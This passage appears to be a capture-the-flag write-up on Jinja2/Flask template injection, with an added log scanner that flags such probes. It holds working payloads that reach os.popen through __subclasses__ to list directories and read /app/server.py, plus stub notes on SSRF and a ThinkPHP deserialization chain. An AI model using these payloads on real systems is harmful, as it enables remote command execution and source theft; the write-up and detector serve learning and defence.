'flask.ctx.AppContext'>", "<class 'flask.ctx.RequestContext'>", "<class 'flask.json.tag.JSONTag'>", "<class 'flask.json.tag.TaggedJSONSerializer'>", "<class 'flask.sessions.SessionInterface'>", "<class 'werkzeug.wrappers.json._JSONModule'>", "<class 'werkzeug.wrappers.json.JSONMixin'>", "<class 'flask.blueprints.BlueprintSetupState'>", "<class 'jinja2.ext.Extension'>", "<class 'jinja2.ext._CommentFinder'>", "<class 'unicodedata.UCD'>"
]
a = "os"
count = 0
# count advances on every entry, so the printed number is the index into __subclasses__()
for i in s:
    if a in i:
        print("{}{}".format(i, count))
    count += 1
?password={{"".__class__.__bases__[0].__subclasses__()[127].__init__.__globals__['popen']('ls').read()}}
After walking the directories by hand, the flag was found
../?password={{"".__class__.__bases__[0].__subclasses__()[127].__init__.__globals__['popen']('cat /app/server.py').read()}}
SSTI reference: https://www.cnblogs.com/20175211lyz/p/11425368.html
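Added example, not from the write-up: a small scanner over constructed access-log lines that flags the {{7*7}} style probe and the __class__/__subclasses__ chain used above when they arrive in a query parameter. The log lines and the verdict names are my own; the afr_3 variant, which arrives in a forged session cookie, would need the cookie rather than the URL inspected.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines in combined-log shape; not taken from the challenge.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Apr/2021:10:00:01 +0000] "GET /?password=hunter2 HTTP/1.1" 200 512
10.0.0.5 - - [01/Apr/2021:10:00:07 +0000] "GET /?password=%7B%7B%22%22.__class__.__bases__%5B0%5D.__subclasses__()%7D%7D HTTP/1.1" 200 90112
10.0.0.5 - - [01/Apr/2021:10:00:09 +0000] "GET /?password=%7B%7B7*7%7D%7D HTTP/1.1" 200 420
10.0.0.9 - - [01/Apr/2021:10:00:12 +0000] "GET /article?name=article HTTP/1.1" 200 1800
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')
# Jinja2 expression or statement delimiters anywhere in a parameter value.
TEMPLATE_RE = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)
# Dunder attributes that the payloads above walk to reach os.popen.
DUNDER_RE = re.compile(r"__(?:class|mro|bases?|subclasses|init|globals|builtins|import)__")


def classify_value(value: str):
    """Return 'gadget-chain', 'probe' or None for one already-decoded parameter value."""
    blocks = TEMPLATE_RE.findall(value)
    if not blocks:
        return None
    if any(DUNDER_RE.search(b) for b in blocks):
        return "gadget-chain"    # walking __class__/__subclasses__ is past the {{7*7}} stage
    return "probe"


def scan_log(text: str) -> list:
    """Return (client, parameter, verdict) for every query parameter that looks like SSTI."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client = line.split(" ", 1)[0]
        query = urlsplit(m.group("target")).query
        # parse_qsl percent-decodes for us, which is what the template engine saw.
        for key, value in parse_qsl(query, keep_blank_values=True):
            verdict = classify_value(value)
            if verdict:
                hits.append((client, key, verdict))
    return hits
```

The unusually large response size on the gadget-chain line (the class list being echoed back) is a second, independent signal worth alerting on.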
[Chapter 3 Web Advanced] SSRF in Python
Emmm,
127.0.0.1 seems to be blocked, and so is localhost
[Chapter 3 Web Advanced] ThinkPHP deserialization exploit chain